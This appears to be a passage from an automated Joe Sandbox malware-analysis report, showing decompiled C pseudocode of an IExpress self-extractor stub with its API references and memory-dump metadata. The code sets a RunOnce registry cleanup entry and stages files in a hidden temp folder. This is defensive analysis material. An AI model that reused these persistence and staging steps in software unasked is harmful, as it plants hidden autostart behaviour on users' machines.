                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                                • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                                • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00026F40() {
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				SetUnhandledExceptionFilter(E00026EF0); // executed
                                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                                			}



                                                                                                                                                                                                                                                0x00026f45
                                                                                                                                                                                                                                                0x00026f4d

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00026F45
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E0002202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				char _v528;
                                                                                                                                                                                                                                                				void* _v532;
                                                                                                                                                                                                                                                				int _v536;
                                                                                                                                                                                                                                                				int _v540;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t28;
                                                                                                                                                                                                                                                				long _t36;
                                                                                                                                                                                                                                                				long _t41;
                                                                                                                                                                                                                                                				struct HINSTANCE__* _t46;
                                                                                                                                                                                                                                                				intOrPtr _t49;
                                                                                                                                                                                                                                                				intOrPtr _t50;
                                                                                                                                                                                                                                                				CHAR* _t54;
                                                                                                                                                                                                                                                				void _t56;
                                                                                                                                                                                                                                                				signed int _t66;
                                                                                                                                                                                                                                                				intOrPtr* _t72;
                                                                                                                                                                                                                                                				void* _t73;
                                                                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                                                                				void* _t80;
                                                                                                                                                                                                                                                				intOrPtr* _t81;
                                                                                                                                                                                                                                                				void* _t86;
                                                                                                                                                                                                                                                				void* _t87;
                                                                                                                                                                                                                                                				void* _t90;
                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                                                                				signed int _t93;
                                                                                                                                                                                                                                                				void* _t94;
                                                                                                                                                                                                                                                				void* _t95;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t79 = __edx;
                                                                                                                                                                                                                                                				_t28 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                                                                				_t84 = 0x104;
                                                                                                                                                                                                                                                				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                                				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                                                                				_t95 = _t94 + 0x18;
                                                                                                                                                                                                                                                				_t66 = 0;
                                                                                                                                                                                                                                                				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                                                                				if(_t36 != 0) {
                                                                                                                                                                                                                                                					L24:
                                                                                                                                                                                                                                                					return E00026CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_push(_t86);
                                                                                                                                                                                                                                                				_t87 = 0;
                                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                                					E0002171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                                                                					_t95 = _t95 + 0x10;
                                                                                                                                                                                                                                                					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                                                                					if(_t41 != 0) {
                                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t87 = _t87 + 1;
                                                                                                                                                                                                                                                					if(_t87 < 0xc8) {
                                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					break;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_t87 != 0xc8) {
                                                                                                                                                                                                                                                					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                                                                					_t79 = _t84;
                                                                                                                                                                                                                                                					E0002658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                                                                					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                                                                					_t84 = _t46;
                                                                                                                                                                                                                                                					if(_t84 == 0) {
                                                                                                                                                                                                                                                						L10:
                                                                                                                                                                                                                                                						if(GetModuleFileNameA( *0x29a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                                							L17:
                                                                                                                                                                                                                                                							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                                							L23:
                                                                                                                                                                                                                                                							_pop(_t86);
                                                                                                                                                                                                                                                							goto L24;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						L11:
                                                                                                                                                                                                                                                						_t72 =  &_v268;
                                                                                                                                                                                                                                                						_t80 = _t72 + 1;
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_t49 =  *_t72;
                                                                                                                                                                                                                                                							_t72 = _t72 + 1;
                                                                                                                                                                                                                                                						} while (_t49 != 0);
                                                                                                                                                                                                                                                						_t73 = _t72 - _t80;
                                                                                                                                                                                                                                                						_t81 = 0x291e4;
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_t50 =  *_t81;
                                                                                                                                                                                                                                                							_t81 = _t81 + 1;
                                                                                                                                                                                                                                                						} while (_t50 != 0);
                                                                                                                                                                                                                                                						_t84 = _t73 + 0x50 + _t81 - 0x291e5;
                                                                                                                                                                                                                                                						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x291e5);
                                                                                                                                                                                                                                                						if(_t90 != 0) {
                                                                                                                                                                                                                                                							 *0x28580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                                                                							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                                                                							if(_t66 == 0) {
                                                                                                                                                                                                                                                								_t54 = "%s /D:%s";
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                                							E0002171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                                                                							_t75 = _t90;
                                                                                                                                                                                                                                                							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                                                                							_t79 = _t23;
                                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                                								_t56 =  *_t75;
                                                                                                                                                                                                                                                								_t75 = _t75 + 1;
                                                                                                                                                                                                                                                							} while (_t56 != 0);
                                                                                                                                                                                                                                                							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                                                                							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                                                                							RegCloseKey(_v532); // executed
                                                                                                                                                                                                                                                							_t36 = LocalFree(_t90);
                                                                                                                                                                                                                                                							goto L23;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t79 = 0x4b5;
                                                                                                                                                                                                                                                						E000244B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                                                                						goto L17;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                                                                					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                                                                					FreeLibrary(_t84); // executed
                                                                                                                                                                                                                                                					if(_t91 == 0) {
                                                                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                                						E0002658A( &_v268, 0x104, 0x21140);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                                				 *0x28530 = _t66;
                                                                                                                                                                                                                                                				goto L23;
                                                                                                                                                                                                                                                			}

































                                                                                                                                                                                                                                                0x00022163
                                                                                                                                                                                                                                                0x00022172
                                                                                                                                                                                                                                                0x00022172
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022163
                                                                                                                                                                                                                                                0x000220ea
                                                                                                                                                                                                                                                0x000220f0
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00022050
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0002205F
                                                                                                                                                                                                                                                • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0002208C
                                                                                                                                                                                                                                                  • Part of subcall function 0002171E: _vsnprintf.MSVCRT ref: 00021750
                                                                                                                                                                                                                                                • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000220C9
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000220EA
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 00022103
                                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00022122
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00022134
                                                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00022144
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 0002215B
                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0002218C
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000221C1
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000221E4
                                                                                                                                                                                                                                                • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0002223D
                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00022249
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00022250
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                                • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 232 255a0-255d9 call 2468f LocalAlloc 235 255db-255f1 call 244b9 call 26285 232->235 236 255fd-2560c call 2468f 232->236 248 255f6-255f8 235->248 242 25632-25643 lstrcmpA 236->242 243 2560e-25630 call 244b9 LocalFree 236->243 246 25645 242->246 247 2564b-25659 LocalFree 242->247 243->248 246->247 250 25696-2569c 247->250 251 2565b-2565d 247->251 252 258b7-258c7 call 26ce0 248->252 253 256a2-256a8 250->253 254 2589f-258b5 call 26517 250->254 255 25669 251->255 256 2565f-25667 251->256 253->254 260 256ae-256c1 GetTempPathA 253->260 254->252 257 2566b-2567a call 25467 255->257 256->255 256->257 269 25680-25691 call 244b9 257->269 270 2589b-2589d 257->270 264 256f3-25711 call 21781 260->264 265 256c3-256c9 call 25467 260->265 274 25717-25729 GetDriveTypeA 264->274 275 2586c-25890 GetWindowsDirectoryA call 2597d 264->275 272 256ce-256d0 265->272 269->248 270->252 272->270 276 256d6-256df call 22630 272->276 278 25730-25740 GetFileAttributesA 274->278 279 2572b-2572e 274->279 275->264 289 25896 275->289 276->264 290 256e1-256ed call 25467 276->290 282 25742-25745 278->282 283 2577e-2578f call 2597d 278->283 279->278 279->282 287 25747-2574f 282->287 288 2576b 282->288 297 257b2-257bf call 22630 283->297 298 25791-2579e call 22630 283->298 291 25771-25779 287->291 294 25751-25753 287->294 288->291 289->270 290->264 290->270 295 25864-25866 291->295 294->291 299 25755-25762 call 26952 294->299 295->274 295->275 307 257d3-257f8 call 2658a GetFileAttributesA 297->307 308 257c1-257cd GetWindowsDirectoryA 297->308 298->288 306 257a0-257b0 call 2597d 298->306 299->288 309 25764-25769 299->309 306->288 306->297 314 2580a 307->314 315 257fa-25808 CreateDirectoryA 307->315 308->307 309->283 309->288 316 2580d-2580f 314->316 
315->316 317 25811-25825 316->317 318 25827-2585c SetFileAttributesA call 21781 call 25467 316->318 317->295 318->270 323 2585e 318->323 323->295
                                                                                                                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                                                                                                                			E000255A0(void* __eflags) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v265;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t28;
                                                                                                                                                                                                                                                				int _t32;
                                                                                                                                                                                                                                                				int _t33;
                                                                                                                                                                                                                                                				int _t35;
                                                                                                                                                                                                                                                				signed int _t36;
                                                                                                                                                                                                                                                				signed int _t38;
                                                                                                                                                                                                                                                				int _t40;
                                                                                                                                                                                                                                                				int _t44;
                                                                                                                                                                                                                                                				long _t48;
                                                                                                                                                                                                                                                				int _t49;
                                                                                                                                                                                                                                                				int _t50;
                                                                                                                                                                                                                                                				signed int _t53;
                                                                                                                                                                                                                                                				int _t54;
                                                                                                                                                                                                                                                				int _t59;
                                                                                                                                                                                                                                                				char _t60;
                                                                                                                                                                                                                                                				int _t65;
                                                                                                                                                                                                                                                				char _t66;
                                                                                                                                                                                                                                                				int _t67;
                                                                                                                                                                                                                                                				int _t68;
                                                                                                                                                                                                                                                				int _t69;
                                                                                                                                                                                                                                                				int _t70;
                                                                                                                                                                                                                                                				int _t71;
                                                                                                                                                                                                                                                				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                                                                				int _t73;
                                                                                                                                                                                                                                                				CHAR* _t82;
                                                                                                                                                                                                                                                				CHAR* _t88;
                                                                                                                                                                                                                                                				void* _t103;
                                                                                                                                                                                                                                                				signed int _t110;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t28 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                                                                				_t2 = E0002468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                                				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                                				if(_t109 != 0) {
                                                                                                                                                                                                                                                					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                                                                					_t32 = E0002468F(_t82, _t109, 1);
                                                                                                                                                                                                                                                					__eflags = _t32;
                                                                                                                                                                                                                                                					if(_t32 != 0) {
                                                                                                                                                                                                                                                						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                                                                						__eflags = _t33;
                                                                                                                                                                                                                                                						if(_t33 == 0) {
                                                                                                                                                                                                                                                							 *0x29a30 = 1;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						LocalFree(_t109);
                                                                                                                                                                                                                                                						_t35 =  *0x28b3e; // 0x0
                                                                                                                                                                                                                                                						__eflags = _t35;
                                                                                                                                                                                                                                                						if(_t35 == 0) {
                                                                                                                                                                                                                                                							__eflags =  *0x28a24; // 0x0
                                                                                                                                                                                                                                                							if(__eflags != 0) {
                                                                                                                                                                                                                                                								L46:
                                                                                                                                                                                                                                                								_t101 = 0x7d2;
                                                                                                                                                                                                                                                								_t36 = E00026517(_t82, 0x7d2, 0, E00023210, 0, 0);
                                                                                                                                                                                                                                                								asm("sbb eax, eax");
                                                                                                                                                                                                                                                								_t38 =  ~( ~_t36);
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								__eflags =  *0x29a30; // 0x0
                                                                                                                                                                                                                                                								if(__eflags != 0) {
                                                                                                                                                                                                                                                									goto L46;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t109 = 0x291e4;
                                                                                                                                                                                                                                                									_t40 = GetTempPathA(0x104, 0x291e4);
                                                                                                                                                                                                                                                									__eflags = _t40;
                                                                                                                                                                                                                                                									if(_t40 == 0) {
                                                                                                                                                                                                                                                										L19:
                                                                                                                                                                                                                                                										_push(_t82);
                                                                                                                                                                                                                                                										E00021781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                                                                										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                                                                										if(_v268 <= 0x5a) {
                                                                                                                                                                                                                                                											do {
                                                                                                                                                                                                                                                												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                                                                												__eflags = _t109 - 6;
                                                                                                                                                                                                                                                												if(_t109 == 6) {
                                                                                                                                                                                                                                                													L22:
                                                                                                                                                                                                                                                													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                                													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                                                                													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                                                                														goto L30;
                                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                                														goto L23;
                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													__eflags = _t109 - 3;
                                                                                                                                                                                                                                                													if(_t109 != 3) {
                                                                                                                                                                                                                                                														L23:
                                                                                                                                                                                                                                                														__eflags = _t109 - 2;
                                                                                                                                                                                                                                                														if(_t109 != 2) {
                                                                                                                                                                                                                                                															L28:
                                                                                                                                                                                                                                                															_t66 = _v268;
                                                                                                                                                                                                                                                															goto L29;
                                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                                															_t66 = _v268;
                                                                                                                                                                                                                                                															__eflags = _t66 - 0x41;
                                                                                                                                                                                                                                                															if(_t66 == 0x41) {
                                                                                                                                                                                                                                                																L29:
                                                                                                                                                                                                                                                																_t60 = _t66 + 1;
                                                                                                                                                                                                                                                																_v268 = _t60;
                                                                                                                                                                                                                                                																goto L42;
                                                                                                                                                                                                                                                															} else {
                                                                                                                                                                                                                                                																__eflags = _t66 - 0x42;
                                                                                                                                                                                                                                                																if(_t66 == 0x42) {
                                                                                                                                                                                                                                                																	goto L29;
                                                                                                                                                                                                                                                																} else {
                                                                                                                                                                                                                                                																	_t68 = E00026952( &_v268);
                                                                                                                                                                                                                                                																	__eflags = _t68;
                                                                                                                                                                                                                                                																	if(_t68 == 0) {
                                                                                                                                                                                                                                                																		goto L28;
                                                                                                                                                                                                                                                																	} else {
                                                                                                                                                                                                                                                																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                                                                																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                                                                																			L30:
                                                                                                                                                                                                                                                																			_push(0);
                                                                                                                                                                                                                                                																			_t103 = 3;
                                                                                                                                                                                                                                                																			_t49 = E0002597D( &_v268, _t103, 1);
                                                                                                                                                                                                                                                																			__eflags = _t49;
                                                                                                                                                                                                                                                																			if(_t49 != 0) {
                                                                                                                                                                                                                                                																				L33:
                                                                                                                                                                                                                                                																				_t50 = E00022630(0,  &_v268, 1);
                                                                                                                                                                                                                                                																				__eflags = _t50;
                                                                                                                                                                                                                                                																				if(_t50 != 0) {
                                                                                                                                                                                                                                                																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                                																				}
                                                                                                                                                                                                                                                																				_t88 =  &_v268;
                                                                                                                                                                                                                                                																				E0002658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                                                                																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                                																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                                                                																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                                																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                                                                																					__eflags = _t54;
                                                                                                                                                                                                                                                																				} else {
                                                                                                                                                                                                                                                																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                                                                																				}
                                                                                                                                                                                                                                                																				__eflags = _t54;
                                                                                                                                                                                                                                                																				if(_t54 != 0) {
                                                                                                                                                                                                                                                																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                                                                																					_push(_t88);
                                                                                                                                                                                                                                                																					_t109 = 0x291e4;
                                                                                                                                                                                                                                                																					E00021781(0x291e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                                                                																					_t101 = 1;
                                                                                                                                                                                                                                                																					_t59 = E00025467(0x291e4, 1, 0);
                                                                                                                                                                                                                                                																					__eflags = _t59;
                                                                                                                                                                                                                                                																					if(_t59 != 0) {
                                                                                                                                                                                                                                                																						goto L45;
                                                                                                                                                                                                                                                																					} else {
                                                                                                                                                                                                                                                																						_t60 = _v268;
                                                                                                                                                                                                                                                																						goto L42;
                                                                                                                                                                                                                                                																					}
                                                                                                                                                                                                                                                																				} else {
                                                                                                                                                                                                                                                																					_t60 = _v268 + 1;
                                                                                                                                                                                                                                                																					_v265 = 0;
                                                                                                                                                                                                                                                																					_v268 = _t60;
                                                                                                                                                                                                                                                																					goto L42;
                                                                                                                                                                                                                                                																				}
                                                                                                                                                                                                                                                																			} else {
                                                                                                                                                                                                                                                																				_t65 = E00022630(0,  &_v268, 1);
                                                                                                                                                                                                                                                																				__eflags = _t65;
                                                                                                                                                                                                                                                																				if(_t65 != 0) {
                                                                                                                                                                                                                                                																					goto L28;
                                                                                                                                                                                                                                                																				} else {
                                                                                                                                                                                                                                                																					_t67 = E0002597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                                                                																					__eflags = _t67;
                                                                                                                                                                                                                                                																					if(_t67 == 0) {
                                                                                                                                                                                                                                                																						goto L28;
                                                                                                                                                                                                                                                																					} else {
                                                                                                                                                                                                                                                																						goto L33;
                                                                                                                                                                                                                                                																					}
                                                                                                                                                                                                                                                																				}
                                                                                                                                                                                                                                                																			}
                                                                                                                                                                                                                                                																		} else {
                                                                                                                                                                                                                                                																			goto L28;
                                                                                                                                                                                                                                                																		}
                                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                                														goto L22;
                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                												goto L47;
                                                                                                                                                                                                                                                												L42:
                                                                                                                                                                                                                                                												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                                                                											} while (_t60 <= 0x5a);
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                										goto L43;
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										_t101 = 1;
                                                                                                                                                                                                                                                										_t69 = E00025467(0x291e4, 1, 3); // executed
                                                                                                                                                                                                                                                										__eflags = _t69;
                                                                                                                                                                                                                                                										if(_t69 != 0) {
                                                                                                                                                                                                                                                											goto L45;
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											_t82 = 0x291e4;
                                                                                                                                                                                                                                                											_t70 = E00022630(0, 0x291e4, 1);
                                                                                                                                                                                                                                                											__eflags = _t70;
                                                                                                                                                                                                                                                											if(_t70 != 0) {
                                                                                                                                                                                                                                                												goto L19;
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												_t101 = 1;
                                                                                                                                                                                                                                                												_t82 = 0x291e4;
                                                                                                                                                                                                                                                												_t71 = E00025467(0x291e4, 1, 1);
                                                                                                                                                                                                                                                												__eflags = _t71;
                                                                                                                                                                                                                                                												if(_t71 != 0) {
                                                                                                                                                                                                                                                													goto L45;
                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                													do {
                                                                                                                                                                                                                                                														goto L19;
                                                                                                                                                                                                                                                														L43:
                                                                                                                                                                                                                                                														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                                														_push(4);
                                                                                                                                                                                                                                                														_t101 = 3;
                                                                                                                                                                                                                                                														_t82 =  &_v268;
                                                                                                                                                                                                                                                														_t44 = E0002597D(_t82, _t101, 1);
                                                                                                                                                                                                                                                														__eflags = _t44;
                                                                                                                                                                                                                                                													} while (_t44 != 0);
                                                                                                                                                                                                                                                													goto L2;
                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                                                                							if(_t35 != 0x5c) {
                                                                                                                                                                                                                                                								L10:
                                                                                                                                                                                                                                                								_t72 = 1;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								__eflags =  *0x28b3f - _t35; // 0x0
                                                                                                                                                                                                                                                								_t72 = 0;
                                                                                                                                                                                                                                                								if(__eflags != 0) {
                                                                                                                                                                                                                                                									goto L10;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							_t101 = 0;
                                                                                                                                                                                                                                                							_t73 = E00025467(0x28b3e, 0, _t72);
                                                                                                                                                                                                                                                							__eflags = _t73;
                                                                                                                                                                                                                                                							if(_t73 != 0) {
                                                                                                                                                                                                                                                								L45:
                                                                                                                                                                                                                                                								_t38 = 1;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t101 = 0x4be;
